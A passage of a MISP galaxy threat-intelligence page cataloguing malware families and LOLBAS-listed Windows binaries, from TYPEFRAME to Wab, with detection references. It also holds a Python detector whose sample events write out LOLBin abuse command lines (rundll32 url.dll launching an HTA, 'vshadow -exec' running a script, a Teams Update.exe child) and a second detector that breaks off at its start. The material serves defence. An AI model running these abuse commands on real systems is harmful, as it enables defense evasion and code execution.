UUID c7f10715-cf13-4360-8511-aa3f93dd7688 which can be used as unique global reference for TURNEDUP in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0199
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

TYPEFRAME

TYPEFRAME is a remote access tool that has been used by Lazarus Group. [US-CERT TYPEFRAME June 2018]

Internal MISP references

UUID 6c93d3c4-cae5-48a9-948d-bc5264230316 which can be used as unique global reference for TYPEFRAME in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0263
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

UACMe

UACMe is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. [Github UACMe]

Internal MISP references

UUID 5788edee-d1b7-4406-9122-bee596362236 which can be used as unique global reference for UACMe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0116
source MITRE
tags ['7de7d799-f836-4555-97a4-0db776eb6932', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type ['tool']

UBoatRAT

UBoatRAT is a remote access tool that was identified in May 2017.[PaloAlto UBoatRAT Nov 2017]

Internal MISP references

UUID 5214ae01-ccd5-4e97-8f9c-14eb16e75544 which can be used as unique global reference for UBoatRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0333
source MITRE
type ['malware']

Umbreon

A Linux rootkit that provides backdoor access and hides from defenders.

Internal MISP references

UUID 227c12df-8126-4e79-b9bd-0e4633fa12fa which can be used as unique global reference for Umbreon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0221
source MITRE
type ['malware']

Universal Virus Sniffer

Universal Virus Sniffer is a tool that can be used for impairing and evading an environment's defenses.[U.S. CISA Phobos February 29 2024]

Internal MISP references

UUID d876bb61-3122-44e7-ace4-f473a7b30f58 which can be used as unique global reference for Universal Virus Sniffer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5276
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e1af18e3-3224-4e4c-9d0f-533768474508']
type ['tool']
Related clusters

To see the related clusters, click here.

Unknown Logger

Unknown Logger is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. [Forcepoint Monsoon]

Internal MISP references

UUID 846b3762-3949-4501-b781-6dca22db088f which can be used as unique global reference for Unknown Logger in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0130
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Unregmp2

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Windows Media Player Setup Utility

Author: Wade Hickey

Paths: * C:\Windows\System32\unregmp2.exe * C:\Windows\SysWOW64\unregmp2.exe

Resources: * https://twitter.com/notwhickey/status/1466588365336293385

Detection: * Sigma: proc_creation_win_lolbin_unregmp2.yml * IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of unregmp2.exe /HideWMP[Unregmp2.exe - LOLBAS Project]

Internal MISP references

UUID 456fb5b3-76e5-47f4-b964-09d68adb889e which can be used as unique global reference for Unregmp2 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5170
source Tidal Cyber
tags ['40f11d0d-09f2-4bd1-bc79-1430464a52a7', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Update

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Author: Oddvar Moe

Paths: * %localappdata%\Microsoft\Teams\update.exe

Resources:
* https://www.youtube.com/watch?v=rOP3hnkj7ls
* https://twitter.com/reegun21/status/1144182772623269889
* https://twitter.com/MrUn1k0d3r/status/1143928885211537408
* https://twitter.com/reegun21/status/1291005287034281990
* http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
* https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
* https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
* https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/

Detection: * Sigma: proc_creation_win_lolbin_squirrel.yml * IOC: Update.exe spawned an unknown process[Update.exe - LOLBAS Project]

Internal MISP references

UUID 487d4c42-12ee-4c90-b284-cca04dadb951 which can be used as unique global reference for Update in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5243
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

UPPERCUT

UPPERCUT is a backdoor that has been used by menuPass. [FireEye APT10 Sept 2018]

Internal MISP references

UUID a3c211f8-52aa-4bfd-8382-940f2194af28 which can be used as unique global reference for UPPERCUT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0275
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Url

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Internet Shortcut Shell Extension DLL.

Author: LOLBAS Team

Paths: * c:\windows\system32\url.dll * c:\windows\syswow64\url.dll

Resources:
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* https://twitter.com/DissectMalware/status/995348436353470465
* https://twitter.com/bohops/status/974043815655956481
* https://twitter.com/yeyint_mth/status/997355558070927360
* https://twitter.com/Hexacorn/status/974063407321223168
* https://windows10dll.nirsoft.net/url_dll.html

Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Url.dll - LOLBAS Project]

Internal MISP references

UUID 96e24cc0-f1ce-4595-90c4-5a4976394db8 which can be used as unique global reference for Url in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5200
source Tidal Cyber
tags ['34505028-b7d8-4da4-8dee-9926f3dbd37a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Uroburos

Uroburos is a sophisticated cyber espionage tool written in C that has been used by units within Russia's Federal Security Service (FSB) associated with the Turla toolset to collect intelligence on sensitive targets worldwide. Uroburos has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. Uroburos is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. Uroburos has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement components.[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023][Kaspersky Turla]

Internal MISP references

UUID 89ffc27c-b81f-473a-87d6-907cacdce61c which can be used as unique global reference for Uroburos in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0022
source MITRE
tags ['1efd43ee-5752-49f2-99fe-e3441f126b00']
type ['malware']
Related clusters

To see the related clusters, click here.

Ursnif

Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[NJCCIC Ursnif Sept 2016][ProofPoint Ursnif Aug 2016] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[TrendMicro Ursnif Mar 2015]

Internal MISP references

UUID 3e501609-87e4-4c47-bd88-5054be0f1037 which can be used as unique global reference for Ursnif in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0386
source MITRE
tags ['15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

USBferry

USBferry is an information stealing malware and has been used by Tropic Trooper in targeted attacks against Taiwanese and Philippine air-gapped military environments. USBferry shares an overlapping codebase with YAHOYAH, though it has several features which makes it a distinct piece of malware.[TrendMicro Tropic Trooper May 2020]

Internal MISP references

UUID 26d93db8-dbc3-44b5-a393-2b219cef4f5b which can be used as unique global reference for USBferry in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0452
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

USBStealer

USBStealer is malware that has been used by APT28 since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with ADVSTORESHELL. [ESET Sednit USBStealer 2014] [Kaspersky Sofacy]

Internal MISP references

UUID 50eab018-8d52-46f5-8252-95942c2c0a89 which can be used as unique global reference for USBStealer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0136
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

UtilityFunctions

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: PowerShell Diagnostic Script

Author: Jimmy (@bohops)

Paths: * C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1

Resources: * https://twitter.com/nickvangilder/status/1441003666274668546

Detection: * Sigma: proc_creation_win_lolbas_utilityfunctions.yml[UtilityFunctions.ps1 - LOLBAS Project]

Internal MISP references

UUID 50a57a6f-6597-42d1-b686-7003c631ddb0 which can be used as unique global reference for UtilityFunctions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5262
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Valak

Valak is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.[Cybereason Valak May 2020][Unit 42 Valak July 2020]

Internal MISP references

UUID b149f12f-3cf4-4547-841d-c63b7677547d which can be used as unique global reference for Valak in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0476
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

VaporRage

VaporRage is a shellcode downloader that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]

Internal MISP references

UUID 63940761-8dea-4362-8795-7bc0653ce1d4 which can be used as unique global reference for VaporRage in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0636
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Vasport

Vasport is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Vasport May 2012]

Internal MISP references

UUID fe116518-cd0c-4b10-8190-4f57208df4e4 which can be used as unique global reference for Vasport in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0207
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

vbc

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Visual Basic .NET command-line compiler; it compiles VB.NET source (not VBScript) and can therefore be used to build attacker-supplied code on the host

Author: Lior Adar

Paths: * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe

Resources: None Provided

Detection: * Sigma: proc_creation_win_lolbin_visual_basic_compiler.yml * Elastic: defense_evasion_dotnet_compiler_parent_process.toml[vbc.exe - LOLBAS Project]

Internal MISP references

UUID 25ae056b-aa3d-4bfb-9b53-ba76bce0dad1 which can be used as unique global reference for vbc in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5171
source Tidal Cyber
tags ['bc6f5172-90af-491e-817d-2eaa522f93af', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

VBShower

VBShower is a backdoor that has been used by Inception since at least 2019. VBShower has been used as a downloader for second stage payloads, including PowerShower.[Kaspersky Cloud Atlas August 2019]

Internal MISP references

UUID 150b6079-bb10-48a8-b570-fbe8b0e3287c which can be used as unique global reference for VBShower in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0442
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Verclsid

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used to verify a COM object before it is instantiated by Windows Explorer

Author: @bohops

Paths: * C:\Windows\System32\verclsid.exe * C:\Windows\SysWOW64\verclsid.exe

Resources: * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 * https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

Detection: * Sigma: proc_creation_win_verclsid_runs_com.yml * Splunk: verclsid_clsid_execution.yml[LOLBAS Verclsid]

Internal MISP references

UUID 56dc0bea-bdfb-4731-b6c0-425fb7f9bf4d which can be used as unique global reference for Verclsid in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5172
source Tidal Cyber
tags ['4e91036d-809b-4eae-8a09-86bdc6cd1f0e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

VERMIN

VERMIN is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. [Unit 42 VERMIN Jan 2018]

Internal MISP references

UUID afa4023f-aa2e-45d6-bb3c-38e61f876eac which can be used as unique global reference for VERMIN in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0257
source MITRE
type ['malware']

Vidar Stealer

Vidar Stealer is one of the most heavily used information & credential stealers ("infostealers") in recent years. While many of today's most popular infostealers were developed relatively recently, Vidar is more established, having been released in 2018. Its developers continue to add new capabilities, however, for example to improve the malware's stealth.[Minerva Labs Vidar Stealer Evasion]

More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).

Internal MISP references

UUID ced8364c-e0e2-429a-a029-300fa2f0d5be which can be used as unique global reference for Vidar Stealer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5071
source Tidal Cyber
tags ['fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

VisualUiaVerifyNative

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.

Author: Jimmy (@bohops)

Paths:
* c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
* c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
* c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe

Resources: * https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ * https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad

Detection:
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* Sigma: proc_creation_win_lolbin_visualuiaverifynative.yml
* IOC: As a Windows SDK binary, execution on a system may be suspicious[VisualUiaVerifyNative.exe - LOLBAS Project]

Internal MISP references

UUID acfbcd12-25fd-41cd-83ef-c7af7cb59fff which can be used as unique global reference for VisualUiaVerifyNative in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5246
source Tidal Cyber
tags ['5e096dac-47b7-4657-a57b-752ef7da0263', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Volgmer

Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. [US-CERT Volgmer Nov 2017]

Internal MISP references

UUID 7fcfba45-5752-4f0c-8023-db67729ae34e which can be used as unique global reference for Volgmer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0180
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

VSDiagnostics

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Visual Studio Diagnostics Hub command-line collector (VSDiagnostics.exe) used for performance diagnostics.

Author: Bobby Cooke

Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe

Resources: * https://twitter.com/0xBoku/status/1679200664013135872

Detection: * Sigma: https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml[VSDiagnostics.exe - LOLBAS Project]

Internal MISP references

UUID fca6d378-bbe6-4418-b238-6a9a63aaabba which can be used as unique global reference for VSDiagnostics in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5244
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Vshadow

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.

Author: Ayberk Halaç

Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.XXXXX.0\x64\vshadow.exe

Resources: * https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample

Detection: * IOC: vshadow.exe usage with -exec parameter[Vshadow.exe - LOLBAS Project]

Internal MISP references

UUID f39988b4-acf7-4d56-a7e5-8e8fa0b8ccc2 which can be used as unique global reference for Vshadow in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5247
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

VSIISExeLauncher

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Launches a specified binary. Part of the Visual Studio (Web Tools) installation.

Author: timwhite

Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe

Resources: * https://github.com/timwhitez

Detection: * Sigma: proc_creation_win_lolbin_vsiisexelauncher.yml * IOC: VSIISExeLauncher.exe spawned an unknown process[VSIISExeLauncher.exe - LOLBAS Project]

Internal MISP references

UUID 2517da5a-11b1-4f77-b488-c096173b1b50 which can be used as unique global reference for VSIISExeLauncher in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5245
source Tidal Cyber
tags ['0bf195a2-c577-4317-973e-a72dde5a06e6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

vsjitdebugger

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Just-In-Time (JIT) debugger included with Visual Studio

Author: Oddvar Moe

Paths: * c:\windows\system32\vsjitdebugger.exe

Resources: * https://twitter.com/pabraeken/status/990758590020452353

Detection: * Sigma: proc_creation_win_susp_use_of_vsjitdebugger_bin.yml[vsjitdebugger.exe - LOLBAS Project]

Internal MISP references

UUID 34ba500e-c37c-45ec-abf4-16e2f76d82c8 which can be used as unique global reference for vsjitdebugger in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5248
source Tidal Cyber
tags ['71bc284c-bfce-4191-80e0-ef70ff4315bf', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

vsls-agent

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Agent for Visual Studio Live Share (Code Collaboration)

Author: Jimmy (@bohops)

Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe

Resources: * https://twitter.com/bohops/status/1583916360404729857

Detection: * Sigma: proc_creation_win_vslsagent_agentextensionpath_load.yml[vsls-agent.exe - LOLBAS Project]

Internal MISP references

UUID 99f752db-12c4-45a7-9f7b-f4fcda033462 which can be used as unique global reference for vsls-agent in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5253
source Tidal Cyber
tags ['375cb8ad-2b6a-49b7-8eb3-757aaaf72d8b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

vstest.console

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: VSTest.Console.exe is the command-line tool to run tests

Author: Onat Uzunyayla

Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe * C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe

Resources: * https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022

Detection: * IOC: vstest.console.exe spawning unexpected processes[vstest.console.exe - LOLBAS Project]

Internal MISP references

UUID dfbe173f-5c36-4596-aefb-7ccf504e03c8 which can be used as unique global reference for vstest.console in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5254
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
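The Detection entries above for Ttdinject, Tttracer, Unregmp2, Update, Url, Verclsid, Vshadow, VSIISExeLauncher, vsjitdebugger, vsls-agent and vstest.console all reduce to two checks on process-creation telemetry: an unexpected parent, or a tell-tale command line. The following Python is an added example written for this page, not LOLBAS or Tidal Cyber code, and runs those checks over constructed Sysmon Event ID 1 records. The rule names, the ProcEvent fields, the assumed Windows Media Player install directory and the choice to treat only the Teams copy of Update.exe as in scope are assumptions to tune against your own baseline.

```python
"""Added example (not LOLBAS or Tidal Cyber code): parent/child and
command-line checks for the LOLBAS entries on this page, run over
constructed Sysmon Event ID 1 (process creation) records."""
from dataclasses import dataclass
import ntpath
import re


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent process


# "Parent for executed command" IOCs: these binaries rarely spawn children in
# normal use, so any child is worth a look. Tune the set to your baseline.
LOLBIN_PARENTS = {
    "ttdinject.exe", "tttracer.exe", "vsiisexelauncher.exe",
    "vsjitdebugger.exe", "vstest.console.exe", "vsls-agent.exe",
}
# update.exe is a generic name; only the Teams/Squirrel copy is in scope here.
TEAMS_UPDATE_SUFFIX = r"\microsoft\teams\update.exe"
# Assumed legitimate home of wmpnscfg.exe (Windows Media Player install dir).
WMP_DIR = r"c:\program files\windows media player"
# verclsid.exe /S /C {CLSID}: a CLSID on the command line is the tell.
GUID_RE = re.compile(r"\{[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I)


def _name(path):
    return ntpath.basename(path).lower()


def classify(ev):
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    child, parent = _name(ev.image), _name(ev.parent_image)
    cmd = ev.command_line.lower()

    if parent in LOLBIN_PARENTS:
        hits.append("lolbin_parent:" + parent)
    if parent == "update.exe" and ev.parent_image.lower().endswith(TEAMS_UPDATE_SUFFIX):
        hits.append("teams_update_spawn")        # Update.exe spawned an unknown process
    if parent == "unregmp2.exe" and child == "wmpnscfg.exe" \
            and not ev.image.lower().startswith(WMP_DIR):
        # unregmp2.exe /HideWMP launches wmpnscfg.exe; a copy outside the WMP
        # directory is the low-prevalence binary the LOLBAS IOC describes
        hits.append("unregmp2_rogue_wmpnscfg")
    if child == "vshadow.exe" and "-exec=" in cmd:
        hits.append("vshadow_exec")              # vshadow.exe -exec=<payload>
    if child == "rundll32.exe" and "url.dll" in cmd:
        hits.append("rundll32_url_dll")          # url.dll,OpenURL / FileProtocolHandler
    if child == "verclsid.exe" and GUID_RE.search(cmd):
        hits.append("verclsid_clsid")
    return hits


def scan(events):
    """Map each firing event's command line to the rules it triggered."""
    out = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            out[ev.command_line] = hits
    return out


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\calc.exe", "calc.exe",
              r"C:\Windows\System32\ttdinject.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\wmpnscfg.exe", "wmpnscfg.exe",
              r"C:\Windows\System32\unregmp2.exe"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe url.dll,OpenURL C:\Users\alice\Downloads\note.hta",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Program Files (x86)\Windows Kits\10\bin\10.0.19041.0\x64\vshadow.exe",
              r"vshadow.exe -nw -exec=C:\Users\alice\AppData\Local\Temp\run.cmd C:",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\verclsid.exe",
              "verclsid.exe /S /C {11111111-2222-3333-4444-555555555555}",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\stage2.exe", "stage2.exe",
              r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe"),
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe",
              r"C:\Windows\explorer.exe"),      # benign control
]
```

The parent-based rules are deliberately broad because the page's IOCs are ("ttdinject.exe parent for executed command"); in production, pair them with a prevalence count per child image so a developer box running vstest.console.exe all day does not page anyone, and keep the path constraint on update.exe, since the bare name matches dozens of legitimate updaters.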

Wab

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Address Book (WAB) manager

Author: Oddvar Moe

Paths: * C:\Program Files\Windows Mail\wab.exe * C:\Program Files (x86)\Windows Mail\wab.exe

Resources: * https://twitter.com/Hexacorn/status/991447379864932352 * http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/

Detection: * Sigma: registry_set_wab_dllpath_reg_change.yml * IOC: WAB.exe should normally never be used[Wab.exe - LOLBAS Project]

Internal MISP references

UUID 6cbd62e8-9024-42d7-93d5-6b8b3409425b which can be used as unique global reference for Wab in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5173
source Tidal Cyber
tags ['a53c9f4b-6f0d-4afa-b1ac-8e2d91279210', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
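The Wab entry above points at a registry-set Sigma rule rather than a process-creation one: wab.exe loads the DLL named by the DLLPath value under Software\Microsoft\WAB (per the cited Hexacorn post), so repointing that value turns a signed Windows binary into a loader. The Python below is an added example, not LOLBAS or Tidal Cyber code; it checks constructed Sysmon Event ID 13 (registry value set) records for that write. The stock DLL path and the trusted-writer list are assumptions; confirm the stock value on your own builds before alerting on deviations from it.

```python
"""Added example (not LOLBAS or Tidal Cyber code): flag Sysmon Event ID 13
(registry value set) records that repoint the WAB DLLPath value."""
from dataclasses import dataclass
import ntpath

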